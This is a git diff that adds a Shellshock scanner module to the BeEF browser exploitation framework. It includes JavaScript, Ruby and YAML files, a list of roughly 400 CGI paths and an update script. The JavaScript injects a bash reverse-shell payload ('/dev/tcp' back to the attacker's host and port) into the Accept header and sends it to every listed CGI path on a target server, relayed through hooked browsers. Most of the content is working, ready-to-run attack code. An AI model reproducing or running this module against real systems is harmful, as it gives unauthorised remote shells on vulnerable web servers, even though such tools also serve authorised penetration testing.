diff --git a/modules/exploits/shell_shock_scanner/command.js b/modules/exploits/shell_shock_scanner/command.js new file mode 100644 index 000000000..98d768ae8 --- /dev/null +++ b/modules/exploits/shell_shock_scanner/command.js @@ -0,0 +1,75 @@ +// +// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var rproto = '<%= @rproto %>'; + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var lhost = '<%= @lhost %>'; + var lport = '<%= @lport %>'; + var target = rproto + '://' + rhost + ':' + rport; + var method = '<%= @method %>'; + var wait = '<%= @wait %>'; + var timeout = '<%= @timeout %>'; + + get_cgi = function(uri) { + try { + var payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1 &"; + var xhr = new XMLHttpRequest(); + xhr.open(method, target+uri, true); + xhr.onload = function () { + }; + xhr.onreadystatechange = function () { + if (xhr.readyState == 4 && xhr.status == 200) { + beef.debug("[command #<%= @command_id %>] Response: " + xhr.response); + } + } + xhr.setRequestHeader("Accept", payload); + xhr.send(null); + } catch (e){ + beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message); + } + } + + var scripts = new Array( +<%= + scripts = [] + File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle| + file_handle.each_line do |line| + uri = line.chomp! + next if uri =~ /^#/ + next if uri.nil? + scripts << "'#{uri}'" + end + end + scripts.shuffle.join(",\n") +%> +); + + // add scripts to queue + var requests = []; + for (var i=0; i", <%= @command_id %>, "result=starting scan"); + var handle = setInterval(function() { + if (requests.length > 0) { + get_cgi(requests.pop()); + } else cleanup(); + }, wait*1000); + + // clean up + cleanup = function() { + if (handle) { + beef.debug("Killing timer [ID: " + handle + "]"); + clearInterval(handle); + handle = 0; + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete"); + } + } + setTimeout("cleanup();", timeout*1000); + +}); diff --git a/modules/exploits/shell_shock_scanner/config.yaml b/modules/exploits/shell_shock_scanner/config.yaml new file mode 100644 index 000000000..be4b5fc61 --- /dev/null +++ b/modules/exploits/shell_shock_scanner/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + shell_shock_scanner: + enable: true + category: "Exploits" + name: "Shell Shock Scanner (Reverse Shell)" + description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.
The list of CGI scripts was taken from Shocker." + authors: ["Stephane Chazelas", "mz", "bmantra", "bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/shell_shock_scanner/module.rb b/modules/exploits/shell_shock_scanner/module.rb new file mode 100644 index 000000000..3e084d3a1 --- /dev/null +++ b/modules/exploits/shell_shock_scanner/module.rb @@ -0,0 +1,42 @@ +# +# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Shell_shock_scanner < BeEF::Core::Command + + def self.options + configuration = BeEF::Core::Configuration.instance + lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host") + lhost = "" if lhost == "0.0.0.0" + return [ + { 'name' => 'method', 'ui_label' => 'HTTP Method', 'value' => 'GET' }, + { 'name' => 'rproto', + 'type' => 'combobox', + 'ui_label' => 'Target Protocol', + 'store_type' => 'arraystore', + 'store_fields' => ['rproto'], + 'store_data' => [ + ['http'], + ['https'] + ], + 'emptyText' => 'Select a protocol (HTTP/HTTPS)', + 'valueField' => 'rproto', + 'displayField' => 'rproto', + 'mode' => 'local', + 'autoWidth' => true + }, + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, + { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost }, + { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' }, + { 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' }, + { 'name' => 'timeout', 'ui_label' => 'Scan timeout (s)', 'value' => '180'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/shell_shock_scanner/shocker-cgi_list b/modules/exploits/shell_shock_scanner/shocker-cgi_list new file mode 100644 index 000000000..abc0127eb --- /dev/null +++ b/modules/exploits/shell_shock_scanner/shocker-cgi_list @@ -0,0 +1,410 @@ +# Resource file for shocker.py +# List of pages/scripts potentially vulnerable to Shellshock +# One per line, no commas, spaces, tabs, etc. +# Credits to the following from whence many were borrowed: +# https://github.com/mubix/shellshocker-pocs/blob/master/shell_sprayer.py +# http://patrickpierson.us/wp-content/uploads/2014/09/shellshock.txt +# http://khalil-shreateh.com/khalil.shtml/index.php/websites/websites-security/201-ais-shellshock-scanning-tool-that-leverages-the-user-agent-header-against-a-large-list-of-possible-targets-written-in-c.html?showall=1 +# http://www.linuxfeed.org/2014/10/advanced-information-security-shellshock-scanner/ +# https://github.com/francisck/shellshock-cgi/blob/master/shellshock_cgi.py +# http://shellshock.detectify.com +/ +/admin.cgi +/administrator.cgi +/agora.cgi +/aktivate/cgi-bin/catgy.cgi +/analyse.cgi +/apps/web/vs_diag.cgi +/axis-cgi/buffer/command.cgi +/b2-include/b2edit.showposts.php +/bandwidth/index.cgi +/bigconf.cgi +/cartcart.cgi +/cart.cgi +/ccbill/whereami.cgi +/cgi-bin/14all-1.1.cgi +/cgi-bin/14all.cgi +/cgi-bin/a1disp3.cgi +/cgi-bin/a1stats/a1disp3.cgi +/cgi-bin/a1stats/a1disp4.cgi +/cgi-bin/addbanner.cgi +/cgi-bin/add_ftp.cgi +/cgi-bin/adduser.cgi +/cgi-bin/admin/admin.cgi +/cgi-bin/admin.cgi +/cgi-bin/admin/getparam.cgi +/cgi-bin/adminhot.cgi +/cgi-bin/admin.pl +/cgi-bin/admin/setup.cgi +/cgi-bin/adminwww.cgi +/cgi-bin/af.cgi +/cgi-bin/aglimpse.cgi +/cgi-bin/alienform.cgi +/cgi-bin/AnyBoard.cgi +/cgi-bin/architext_query.cgi +/cgi-bin/astrocam.cgi +/cgi-bin/AT-admin.cgi +/cgi-bin/AT-generate.cgi +/cgi-bin/auction/auction.cgi +/cgi-bin/auktion.cgi +/cgi-bin/ax-admin.cgi +/cgi-bin/ax.cgi +/cgi-bin/axs.cgi +/cgi-bin/badmin.cgi +/cgi-bin/banner.cgi +/cgi-bin/bannereditor.cgi +/cgi-bin/bb-ack.sh +/cgi-bin/bb-histlog.sh +/cgi-bin/bb-hist.sh +/cgi-bin/bb-hostsvc.sh +/cgi-bin/bb-replog.sh +/cgi-bin/bb-rep.sh +/cgi-bin/bbs_forum.cgi +/cgi-bin/bigconf.cgi +/cgi-bin/bizdb1-search.cgi +/cgi-bin/blog/mt-check.cgi +/cgi-bin/blog/mt-load.cgi +/cgi-bin/bnbform.cgi +/cgi-bin/book.cgi +/cgi-bin/boozt/admin/index.cgi +/cgi-bin/bsguest.cgi +/cgi-bin/bslist.cgi +/cgi-bin/build.cgi +/cgi-bin/bulk/bulk.cgi +/cgi-bin/cached_feed.cgi +/cgi-bin/cachemgr.cgi +/cgi-bin/calendar/index.cgi +/cgi-bin/cartmanager.cgi +/cgi-bin/cbmc/forums.cgi +/cgi-bin/ccvsblame.cgi +/cgi-bin/c_download.cgi +/cgi-bin/cgforum.cgi +/cgi-bin/.cgi +/cgi-bin/cgi_process +/cgi-bin/classified.cgi +/cgi-bin/classifieds.cgi +/cgi-bin/classifieds/classifieds.cgi +/cgi-bin/classifieds/index.cgi +/cgi-bin/.cobalt/alert/service.cgi +/cgi-bin/.cobalt/message/message.cgi +/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi +/cgi-bin/commandit.cgi +/cgi-bin/commerce.cgi +/cgi-bin/common/listrec.pl +/cgi-bin/compatible.cgi +/cgi-bin/Count.cgi +/cgi-bin/csChatRBox.cgi +/cgi-bin/csGuestBook.cgi +/cgi-bin/csLiveSupport.cgi +/cgi-bin/CSMailto.cgi +/cgi-bin/CSMailto/CSMailto.cgi +/cgi-bin/csNews.cgi +/cgi-bin/csNewsPro.cgi +/cgi-bin/csPassword.cgi +/cgi-bin/csPassword/csPassword.cgi +/cgi-bin/csSearch.cgi +/cgi-bin/csv_db.cgi +/cgi-bin/cvsblame.cgi +/cgi-bin/cvslog.cgi +/cgi-bin/cvsquery.cgi +/cgi-bin/cvsqueryform.cgi +/cgi-bin/day5datacopier.cgi +/cgi-bin/day5datanotifier.cgi +/cgi-bin/db_manager.cgi +/cgi-bin/dbman/db.cgi +/cgi-bin/dcforum.cgi +/cgi-bin/dcshop.cgi +/cgi-bin/dfire.cgi +/cgi-bin/diagnose.cgi +/cgi-bin/dig.cgi +/cgi-bin/directorypro.cgi +/cgi-bin/download.cgi +/cgi-bin/e87_Ba79yo87.cgi +/cgi-bin/emu/html/emumail.cgi +/cgi-bin/emumail.cgi +/cgi-bin/emumail/emumail.cgi +/cgi-bin/enter.cgi +/cgi-bin/environ.cgi +/cgi-bin/ezadmin.cgi +/cgi-bin/ezboard.cgi +/cgi-bin/ezman.cgi +/cgi-bin/ezshopper2/loadpage.cgi +/cgi-bin/ezshopper3/loadpage.cgi +/cgi-bin/ezshopper/loadpage.cgi +/cgi-bin/ezshopper/search.cgi +/cgi-bin/faqmanager.cgi +/cgi-bin/FileSeek2.cgi +/cgi-bin/FileSeek.cgi +/cgi-bin/finger.cgi +/cgi-bin/flexform.cgi +/cgi-bin/fom.cgi +/cgi-bin/fom/fom.cgi +/cgi-bin/FormHandler.cgi +/cgi-bin/FormMail.cgi +/cgi-bin/gbadmin.cgi +/cgi-bin/gbook/gbook.cgi +/cgi-bin/generate.cgi +/cgi-bin/getdoc.cgi +/cgi-bin/gH.cgi +/cgi-bin/gm-authors.cgi +/cgi-bin/gm.cgi +/cgi-bin/gm-cplog.cgi +/cgi-bin/guestbook.cgi +/cgi-bin/handler +/cgi-bin/handler.cgi +/cgi-bin/handler/netsonar +/cgi-bin/hitview.cgi +/cgi-bin/hsx.cgi +/cgi-bin/html2chtml.cgi +/cgi-bin/html2wml.cgi +/cgi-bin/htsearch.cgi +/cgi-bin/icat +/cgi-bin/if/admin/nph-build.cgi +/cgi-bin/ikonboard/help.cgi +/cgi-bin/ImageFolio/admin/admin.cgi +/cgi-bin/imageFolio.cgi +/cgi-bin/index.cgi +/cgi-bin/infosrch.cgi +/cgi-bin/jammail.pl +/cgi-bin/journal.cgi +/cgi-bin/lastlines.cgi +/cgi-bin/loadpage.cgi +/cgi-bin/login.cgi +/cgi-bin/logit.cgi +/cgi-bin/log-reader.cgi +/cgi-bin/lookwho.cgi +/cgi-bin/lwgate.cgi +/cgi-bin/MachineInfo +/cgi-bin/MachineInfo +/cgi-bin/magiccard.cgi +/cgi-bin/mail/emumail.cgi +/cgi-bin/maillist.cgi +/cgi-bin/mailnews.cgi +/cgi-bin/mail/nph-mr.cgi +/cgi-bin/main.cgi +/cgi-bin/main_menu.pl +/cgi-bin/man.sh +/cgi-bin/mini_logger.cgi +/cgi-bin/mmstdod.cgi +/cgi-bin/moin.cgi +/cgi-bin/mojo/mojo.cgi +/cgi-bin/mrtg.cgi +/cgi-bin/mt.cgi +/cgi-bin/mt/mt.cgi +/cgi-bin/mt/mt-check.cgi +/cgi-bin/mt/mt-load.cgi +/cgi-bin/mt-static/mt-check.cgi +/cgi-bin/mt-static/mt-load.cgi +/cgi-bin/musicqueue.cgi +/cgi-bin/myguestbook.cgi +/cgi-bin/.namazu.cgi +/cgi-bin/nbmember.cgi +/cgi-bin/netauth.cgi +/cgi-bin/netpad.cgi +/cgi-bin/newsdesk.cgi +/cgi-bin/nlog-smb.cgi +/cgi-bin/nph-emumail.cgi +/cgi-bin/nph-exploitscanget.cgi +/cgi-bin/nph-publish.cgi +/cgi-bin/nph-test.cgi +/cgi-bin/pagelog.cgi +/cgi-bin/pbcgi.cgi +/cgi-bin/perlshop.cgi +/cgi-bin/pfdispaly.cgi +/cgi-bin/pfdisplay.cgi +/cgi-bin/phf.cgi +/cgi-bin/photo/manage.cgi +/cgi-bin/photo/protected/manage.cgi +/cgi-bin/php-cgi +/cgi-bin/php.cgi +/cgi-bin/php.fcgi +/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi +/cgi-bin/pollssi.cgi +/cgi-bin/postcards.cgi +/cgi-bin/powerup/r.cgi +/cgi-bin/printenv +/cgi-bin/probecontrol.cgi +/cgi-bin/profile.cgi +/cgi-bin/publisher/search.cgi +/cgi-bin/quickstore.cgi +/cgi-bin/quizme.cgi +/cgi-bin/ratlog.cgi +/cgi-bin/r.cgi +/cgi-bin/register.cgi +/cgi-bin/replicator/webpage.cgi/ +/cgi-bin/responder.cgi +/cgi-bin/robadmin.cgi +/cgi-bin/robpoll.cgi +/cgi-bin/rtpd.cgi +/cgi-bin/sbcgi/sitebuilder.cgi +/cgi-bin/scoadminreg.cgi +/cgi-bin-sdb/printenv +/cgi-bin/sdbsearch.cgi +/cgi-bin/search +/cgi-bin/search.cgi +/cgi-bin/search/search.cgi +/cgi-bin/sendform.cgi +/cgi-bin/shop.cgi +/cgi-bin/shopper.cgi +/cgi-bin/shopplus.cgi +/cgi-bin/showcheckins.cgi +/cgi-bin/simplestguest.cgi +/cgi-bin/simplestmail.cgi +/cgi-bin/smartsearch.cgi +/cgi-bin/smartsearch/smartsearch.cgi +/cgi-bin/snorkerz.bat +/cgi-bin/snorkerz.bat +/cgi-bin/snorkerz.cmd +/cgi-bin/snorkerz.cmd +/cgi-bin/sojourn.cgi +/cgi-bin/spin_client.cgi +/cgi-bin/start.cgi +/cgi-bin/status +/cgi-bin/status_cgi +/cgi-bin/store/agora.cgi +/cgi-bin/store.cgi +/cgi-bin/store/index.cgi +/cgi-bin/survey.cgi +/cgi-bin/sync.cgi +/cgi-bin/talkback.cgi +/cgi-bin/technote/main.cgi +/cgi-bin/test2.pl +/cgi-bin/test-cgi +/cgi-bin/test.cgi +/cgi-bin/testing_whatever +/cgi-bin/test/test.cgi +/cgi-bin/tidfinder.cgi +/cgi-bin/tigvote.cgi +/cgi-bin/title.cgi +/cgi-bin/top.cgi +/cgi-bin/traffic.cgi +/cgi-bin/troops.cgi +/cgi-bin/ttawebtop.cgi/ +/cgi-bin/ultraboard.cgi +/cgi-bin/upload.cgi +/cgi-bin/urlcount.cgi +/cgi-bin/viewcvs.cgi +/cgi-bin/view_help.cgi +/cgi-bin/viralator.cgi +/cgi-bin/virgil.cgi +/cgi-bin/vote.cgi +/cgi-bin/vpasswd.cgi +/cgi-bin/way-board.cgi +/cgi-bin/way-board/way-board.cgi +/cgi-bin/webbbs.cgi +/cgi-bin/webcart/webcart.cgi +/cgi-bin/webdist.cgi +/cgi-bin/webif.cgi +/cgi-bin/webmail/html/emumail.cgi +/cgi-bin/webmap.cgi +/cgi-bin/webspirs.cgi +/cgi-bin/Web_Store/web_store.cgi +/cgi-bin/whois.cgi +/cgi-bin/whois_raw.cgi +/cgi-bin/whois/whois.cgi +/cgi-bin/wrap +/cgi-bin/wrap.cgi +/cgi-bin/wwwboard.cgi.cgi +/cgi-bin/YaBB/YaBB.cgi +/cgi-bin/zml.cgi +/cgi-mod/index.cgi +/cgis/wwwboard/wwwboard.cgi +/cgi-sys/addalink.cgi +/cgi-sys/defaultwebpage.cgi +/cgi-sys/domainredirect.cgi +/cgi-sys/entropybanner.cgi +/cgi-sys/entropysearch.cgi +/cgi-sys/FormMail-clone.cgi +/cgi-sys/helpdesk.cgi +/cgi-sys/mchat.cgi +/cgi-sys/randhtml.cgi +/cgi-sys/realhelpdesk.cgi +/cgi-sys/realsignup.cgi +/cgi-sys/signup.cgi +/connector.cgi +/cp/rac/nsManager.cgi +/create_release.sh +/CSNews.cgi +/csPassword.cgi +/dcadmin.cgi +/dcboard.cgi +/dcforum.cgi +/dcforum/dcforum.cgi +/debuff.cgi +/debug.cgi +/details.cgi +/edittag/edittag.cgi +/emumail.cgi +/enter_buff.cgi +/enter_bug.cgi +/ez2000/ezadmin.cgi +/ez2000/ezboard.cgi +/ez2000/ezman.cgi +/fcgi-bin/echo +/fcgi-bin/echo +/fcgi-bin/echo2 +/fcgi-bin/echo2 +/Gozila.cgi +/hitmatic/analyse.cgi +/hp_docs/cgi-bin/index.cgi +/html/cgi-bin/cgicso +/html/cgi-bin/cgicso +/index.cgi +/info.cgi +/infosrch.cgi +/login.cgi +/mailview.cgi +/main.cgi +/megabook/admin.cgi +/ministats/admin.cgi +/mods/apage/apage.cgi +/_mt/mt.cgi +/musicqueue.cgi +/ncbook.cgi +/newpro.cgi +/newsletter.sh +/oem_webstage/cgi-bin/oemapp_cgi +/page.cgi +/parse_xml.cgi +/photodata/manage.cgi +/photo/manage.cgi +/print.cgi +/process_buff.cgi +/process_bug.cgi +/pub/english.cgi +/quikmail/nph-emumail.cgi +/quikstore.cgi +/reviews/newpro.cgi +/ROADS/cgi-bin/search.pl +/sample01.cgi +/sample02.cgi +/sample03.cgi +/sample04.cgi +/sampleposteddata.cgi +/scancfg.cgi +/scancfg.cgi +/servers/link.cgi +/setpasswd.cgi +/SetSecurity.shm +/shop/member_html.cgi +/shop/normal_html.cgi +/site_searcher.cgi +/siteUserMod.cgi +/submit.cgi +/technote/print.cgi +/template.cgi +/test.cgi +/upload.cgi +/userreg.cgi +/users/scripts/submit.cgi +/vood/cgi-bin/vood_view.cgi +/Web_Store/web_store.cgi +/webtools/bonsai/ccvsblame.cgi +/webtools/bonsai/cvsblame.cgi +/webtools/bonsai/cvslog.cgi +/webtools/bonsai/cvsquery.cgi +/webtools/bonsai/cvsqueryform.cgi +/webtools/bonsai/showcheckins.cgi +/wwwadmin.cgi +/wwwboard.cgi +/wwwboard/wwwboard.cgi diff --git a/modules/exploits/shell_shock_scanner/update-list b/modules/exploits/shell_shock_scanner/update-list new file mode 100755 index 000000000..207c1723b --- /dev/null +++ b/modules/exploits/shell_shock_scanner/update-list @@ -0,0 +1,5 @@ +#!/bin/sh +echo "[*] Deleting old shocker-cgi_list..." +rm shocker-cgi_list +echo "[*] Downloading latest shocker-cgi_list..." +wget "https://raw.githubusercontent.com/nccgroup/shocker/master/shocker-cgi_list"